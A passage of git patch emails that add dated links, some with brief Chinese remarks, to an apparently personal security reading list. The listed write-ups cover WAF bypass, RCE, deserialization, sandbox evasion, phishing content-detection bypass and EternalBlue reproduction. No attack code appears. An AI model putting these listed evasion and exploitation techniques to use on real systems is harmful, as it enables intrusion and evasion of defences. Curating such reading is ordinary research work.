17:06:56 +0800 Subject: [PATCH 295/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e25be21..43b12c0 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -287,3 +287,4 @@ + 2023/03/02 [【渗透测试实战】--waf绕过--打狗棒法](https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==&mid=2247527297&idx=1&sn=d7f1896b68a2253dcecf2780fb49b8ba&chksm=ce64c118f913480e4edd66dff46f1a9181b5c61dd1b3324db41b95338804a7124868c5740fff&mpshare=1&scene=23&srcid=03026OJPm0666pbtYyYnpZVR&sharer_sharetime=1677756888794&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **1.Content-Type中的boundary边界混淆绕过 ** + 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) + 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) ++ 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce From f522f8d08343b78113d6eba260a4cdd8285b148d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Mar 2023 15:27:52 +0800 Subject: [PATCH 296/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 43b12c0..cc935fb 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -288,3 +288,4 @@ + 2023/03/05 [代码执行之篡改 deb 包控制文件](https://xz.aliyun.com/t/12250) **在考虑msi 安装程序能不能利用?** [Threat Analysis: MSI - Masquerading as a Software Installer](https://www.cybereason.com/blog/threat-analysis-msi-masquerading-as-software-installer) + 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) + 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce ++ 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) From 6a53275e3d9f210d69ba80eec2d8f41856d79dee Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Mar 2023 21:26:49 +0800 Subject: [PATCH 297/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index cc935fb..9c448bc 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -289,3 +289,4 @@ + 2023/03/07 [为什么 Nginx 比 Apache 更牛叉?](https://mp.weixin.qq.com/s/nz0OZsa0rEyF5L40rD5zYg) + 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce + 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) ++ 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** From a27e7a5591ab749e9162871f86836366aae41ede Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sat, 11 Mar 2023 23:55:29 +0800 Subject: [PATCH 298/332] Update Readme.md --- Jetty/Readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Jetty/Readme.md b/Jetty/Readme.md index c036d30..5d7c237 100644 --- a/Jetty/Readme.md +++ b/Jetty/Readme.md @@ -2,4 +2,4 @@ 好文章: -https://swarm.ptsecurity.com/tag/web-application-security/ +https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ From 76f698fba4673f0994ce12893e07ecd9d32565c1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Mar 2023 18:50:02 +0800 Subject: [PATCH 299/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9c448bc..9e15d67 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -290,3 +290,4 @@ + 2023/03/08 [A New Vector For “Dirty” Arbitrary File Write to RCE](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) [uwsgi生产环境](https://www.cnblogs.com/chunlin99x/p/16291085.html) uwsgi环境写文件rce + 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) + 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** ++ 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** From 02d456e5f11c485967dd31b5301e12d19a26766d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Mar 2023 19:09:17 +0800 Subject: [PATCH 300/332] Update Readme.md --- Jetty/Readme.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/Jetty/Readme.md b/Jetty/Readme.md index 5d7c237..5405b5c 100644 --- a/Jetty/Readme.md +++ b/Jetty/Readme.md @@ -3,3 +3,5 @@ 好文章: https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/ + +https://xz.aliyun.com/t/10039 From 3f9c672c1d196f3f2f511be00585af28fc660134 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 12 Mar 2023 22:59:08 +0800 Subject: [PATCH 301/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 9e15d67..65c6fc7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -291,3 +291,4 @@ + 2023/03/11 [CVE-2022-36413 Unauthorized Reset Password of Zoho ManageEngine ADSelfService Plus](https://blog.noah.360.net/cve-2022-36413-unauthorized-reset-password-of-zoho-manageengine-adselfservice-plus/) + 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** + 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** ++ 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** From 8ea03eebe5c5fe80c327f099b15fa780f054640a Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 13 Mar 2023 18:12:18 +0800 Subject: [PATCH 302/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 65c6fc7..e11e728 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -292,3 +292,4 @@ + 2023/03/11 [第53篇:某OA系统的H2数据库延时注入点不出网拿shell方法](https://mp.weixin.qq.com/s/Lu4V_J6cresqmVnfQmg05g) **思路不错** + 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** + 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** ++ 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** From fe7f2867c318b254903e4b6be87a08b85339c787 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 14 Mar 2023 10:33:17 +0800 Subject: [PATCH 303/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e11e728..46272cd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -293,3 +293,4 @@ + 2023/03/12 [chatgpt能分析0day漏洞么?](https://mp.weixin.qq.com/s?__biz=MzI1MDA1MjcxMw==&mid=2649907994&idx=1&sn=8984318d81b046ab202650f52557a12b&chksm=f18eea1cc6f9630aca2d2e6d88a767ffc5bd2f44e4367e1b0c68669b11097388b3c5f1e044a0&mpshare=1&scene=23&srcid=0312uHzVdJj4KvnBdTHy0TKM&sharer_sharetime=1678611522010&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **ai np** + 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** + 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** ++ 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) From 26ee70fed9e9fbe051a6a85cbe68e70864e4be8f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 15 Mar 2023 14:43:24 +0800 Subject: [PATCH 304/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 46272cd..1e58f49 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -294,3 +294,4 @@ + 2023/03/12 [钓鱼邮件中绕过内容检测的一种方式](https://mp.weixin.qq.com/s/oDFCn5K4rXXg-_ALv0-qYw) **bypass 好多内容敏感检测** + 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** + 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) From ab0ce4738def82270edfe486823fa1b7c32e18f5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 17 Mar 2023 12:11:19 +0800 Subject: [PATCH 305/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1e58f49..b0f69b6 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -295,3 +295,4 @@ + 2023/03/13 [攻击技术研判 | 使用蜂鸣器对抗沙箱检测技术](https://mp.weixin.qq.com/s/DrUWV4baPIA3WtCVjFp3gw) **就是利用其api实现sleep的效果,对抗沙箱** + 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) ++ 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** From 48d65e312141dca3421ec78d72f5d2fb56964f3d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 17 Mar 2023 12:15:35 +0800 Subject: [PATCH 306/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index b0f69b6..1c76aa4 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -296,3 +296,4 @@ + 2023/03/14 [从挑战赛看阿里云RASP防御优势与云上最佳实践](https://mp.weixin.qq.com/s?__biz=MzA4MTQ2MjI5OA==&mid=2664088876&idx=1&sn=cc29a7dc475e08300390eae40902808d&chksm=84aaf059b3dd794fe63c1f8af5cdafbca404bdd2e956a658f0807ba5e74d98cfc9369573e64c&mpshare=1&scene=23&srcid=0313b3xCwrxOPs14Cc4DeDtz&sharer_sharetime=1678702681315&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) + 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** ++ 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) From c5e3fd5a005c6f7030be432f06c93deca0810798 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 19 Mar 2023 21:11:47 +0800 Subject: [PATCH 307/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 1c76aa4..898ef28 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -297,3 +297,4 @@ + 2023/03/15 [永恒之蓝Windows10版踩坑复现](https://mp.weixin.qq.com/s/H8cOsXmH0EzDPEBsPgvMrg) + 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** + 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) ++ 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) From 0d43bc7ef57d10776b06583692dbba4093953358 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 23 Mar 2023 21:11:49 +0800 Subject: [PATCH 308/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 898ef28..ee3471a 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -298,3 +298,4 @@ + 2023/03/17 [老洞新绕](https://mp.weixin.qq.com/s/V1MWq8NBkSDjTBY4AiW6Pw) **tomcat 路径特性和Axis特性** + 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) + 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) ++ 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 From c291cec664f149a2fb45451db3d479f000046eb5 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 24 Mar 2023 12:45:48 +0800 Subject: [PATCH 309/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ee3471a..7781424 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -299,3 +299,4 @@ + 2023/03/17 [Spring Boot 如果防护 XSS + SQL 注入攻击 ?一文带你搞定!](https://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjghttps://mp.weixin.qq.com/s/QTUr9ZiXMWqFu1-yhMICjg) + 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) + 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 ++ 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** From 24304a9f545ebf842434f36cacb1220c48c18fea Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 26 Mar 2023 23:25:59 +0800 Subject: [PATCH 310/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7781424..bfe30ae 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -300,3 +300,4 @@ + 2023/03/19 [Django下防御Race Condition漏洞](https://mp.weixin.qq.com/s/9f5Hxoyw5ne8IcYx4uwwvQ) + 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 + 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** ++ 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** From 9af26cc993bddda3ccc2a202e6f9b0e22d765470 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 27 Mar 2023 19:54:03 +0800 Subject: [PATCH 311/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index bfe30ae..6a21d12 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -301,3 +301,4 @@ + 2023/03/23 [redis未授权到shiro反序列化](https://xz.aliyun.com/t/11198) 在shiro中不错,可以尝试找其他触发点,基本上在数据库的操作上 + 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** ++ 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) From 282f20b743e8af584e7c6c4f7c045de618cc54a6 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 29 Mar 2023 00:24:32 +0800 Subject: [PATCH 312/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6a21d12..d96dcc5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -302,3 +302,4 @@ + 2023/03/24 [Flink RCE via jar/plan API Endpoint in JDK8](https://mp.weixin.qq.com/s?srcid=0324U8WlT7MpOqTIt0vM2MJD&scene=23&sharer_sharetime=1679630653991&mid=2247495227&sharer_shareid=33fdea7abe6be586e131951d667ccd06&sn=5ab9bcc3d89d57ff9799f88c3363814c&idx=1&__biz=MzkyNDA5NjgyMg%3D%3D&chksm=c1d9ae62f6ae2774dd25902c116f6c24f3e5bbf68836f676c25aac53f2c6b771b4a3823c3e7e&mpshare=1#rd) **hessian的利用** + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** + 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) ++ 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) From 20b5786ca9b869a15db0ec7a4f46909763ac2ac1 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 31 Mar 2023 18:46:35 +0800 Subject: [PATCH 313/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d96dcc5..334f5cb 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -303,3 +303,4 @@ + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** + 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) + 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) ++ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) From 0cdb50a994eb55971dcaedb1465a83dd0d3d0443 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Fri, 31 Mar 2023 23:50:21 +0800 Subject: [PATCH 314/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 334f5cb..fbd35d5 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -303,4 +303,5 @@ + 2023/03/26 [公开一个macOS命令执行技巧](https://mp.weixin.qq.com/s/GZ5eS_lHiBBb7jHNu6PUgg) **因为自己在使用了** + 2023/03/27 [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/) + 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) -+ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) ++ 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) ++ 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** From f1466e40c539bf66fbeee93a55d257fa9072de71 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 2 Apr 2023 12:36:47 +0800 Subject: [PATCH 315/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index fbd35d5..20f0e65 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -305,3 +305,4 @@ + 2023/03/29 [zeppelin 未授权任意命令执行漏洞复现](https://edu.hetianlab.com/post/94) + 2023/03/31 [SQL注入&预编译](https://forum.butian.net/share/1559) + 2023/03/31 [The curl quirk that exposed Burp Suite & Google Chrome](https://portswigger.net/research/the-curl-quirk-that-exposed-burp-suite-amp-google-chrome) **@的问题** ++ 2023/04/02 [日志库logback的攻击路径](https://mp.weixin.qq.com/s/OBwxaijYCjnvo8I0OBusug) From 107eef4293456b781659d8cf19b02e8828a481cf Mon Sep 17 00:00:00 2001 From: Firebasky 